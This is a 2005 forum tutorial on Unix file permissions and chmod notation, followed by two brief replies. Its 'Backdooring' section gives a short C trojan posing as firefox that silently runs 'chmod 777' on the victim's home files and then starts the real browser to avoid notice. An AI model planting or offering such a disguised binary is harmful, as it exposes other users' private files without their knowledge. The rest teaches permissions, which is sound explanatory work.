Page 1 of 1

Unix File Permissions Filtering access to specific files. Rate Topic: ***** 1 Votes

#1 tecta  Icon User is offline

  • New D.I.C Head
  • member icon

Reputation: 0
  • View blog
  • Posts: 2
  • Joined: 13-March 05

Posted 13 March 2005 - 10:39 PM

Unix File Permissions


About

In this article I hope for the reader to understand unix file permissions. Unix file permissions set boundaries for other users that aren't permitted to read/write/execute to that file. By understanding unix file permissions you do a major stop, for attempt access from local users. In this article I will explain the `chmod` command, and how it's organized. Also, I will explain what people can do if a file isn't chmod'd correctly. And I will display some backdoor code users may beable to use from incorrect chmod settings.

------------------------------

Permissions and Such

Now you may be asking "what is chmod?" Well, chmod is basically the Unix command for setting permissions to files. It's as simple as that, and isn't a hard command to follow. Aknowledge the following...

Owner | Group | Everyone Else

^^ This shows how chmod is handled. This may seem confusing at first but with a few examples you will hopefully understand.

Owner - The owner of the file (basically it's in the owners dir).
Group - If the owner is in a specific group like wheel, he will beable to give permissions to that file differently then his, and others.
Everyone Else - The outside world, or other users not in his group, and ofcourse not him. Everyone else also indicates if the file is presented on the web, then the people `trying` to read/write/exec the file, will have it permissions different then the owner for security reasons.

Consider doing the following:

$ ls -l
$ touch example
$ chmod 777 example
$ ls -la

`$` is the shell... ls is just a command to list files, and -l is an argument to show details (hence permission settings). touch just makes the file. chmod just sets the permissions.

-------------------------------------------------
Example:

r = read, w = write, x = execute (exec)

$ root@ANIGMA:~# ls -l
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~

$ chmod 777 data1.cpp

$ ls
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~

---------------------------------

Okay, now notice that

Old: -rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
New: -rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*

Notice anything? 7 7 7
^ Owner ^ Group ^ Other

x = 1
w = 2
r = 4

1+2+4 = 7

So, 7 = highest permission.

$ chmod 755 example
By doing this..

Owner = r+w+x (full access)
Group = r+x (Access, but not not full. Just reading, and executing)
Other = r+x (dito)

Understanding your rights

Reading access is just able to cat, or vi it. You can read the source basically. But you can't execute it. Like you can't do a

$ ./blah

By not providing users with reading options, you protect letters not wanting to be read, or source not wanting to be read.

Execution access is basically being able to `run` something.

$ ./blah

By being able to exec something, you are able to run scripts under someone elses access. So say a user doesn't set an appropriate permission to a file. You can run it under their permissions, which may be higher then yours. Let's say it's root. So it's a good idea to understand what your doing.

Writing access is basically being able to update something. So say you want to update someones code. You can backdoor it (which I will show later). By backdooring it, this can cause all kinds of havok.

Backdooring

Let's say that someone has firefox on their desktop. And it's named `firefox`. So you make a `firefox` in your dir. Maybe the code looks something like this...

#include <stdio.h>
#include <stdlib.h>

int main()
{
system("cd;chmod 777 *"); /* Just goes to users root dir, and gives full access to all his files. */
system("/sbin/firefox");
return 0;
}



Now, this file should be replaced with the other users file. Everytime he runs the script he updates his files with a full access permission. He will also be satisfied since the real path to firefox is executed.

That code is just an example, I don't know the exact path to firefox, and firefox is just an example I used.

-cheers tecta

Is This A Good Question/Topic? 0
  • +

Replies To: Unix File Permissions

#2 no2pencil  Icon User is offline

  • Head MFIC
  • member icon

Reputation: 5068
  • View blog
  • Posts: 26,450
  • Joined: 10-May 07

Posted 15 June 2007 - 08:36 AM

View Posttecta, on 13 Mar, 2005 - 10:39 PM, said:

That code is just an example, I don't know the exact path to firefox, and firefox is just an example I used.

1st: Great tutorial. An oldie but a goodie, the file level permissions.

The thing with the path on firefox installed on a Linux system is this: the binary executable is installed wherever you tell it to. What I've done in the past is put firefox into my downloads directory (/home/no2pencil/downloads/firefox-2.0.whatever) & then create a symbolic link from that executable to /usr/local/bin so it can launch from any directory.
Was This Post Helpful? 0
  • +
  • -

#3 k.sangeeth  Icon User is offline

  • D.I.C Head

Reputation: 0
  • View blog
  • Posts: 62
  • Joined: 27-July 07

Posted 02 August 2007 - 09:55 PM

good try to help in understanding file permissions in linux..
Can anyone add more to concept of sticky keys ..
I always get confused in this topic
Was This Post Helpful? 0
  • +
  • -

Page 1 of 1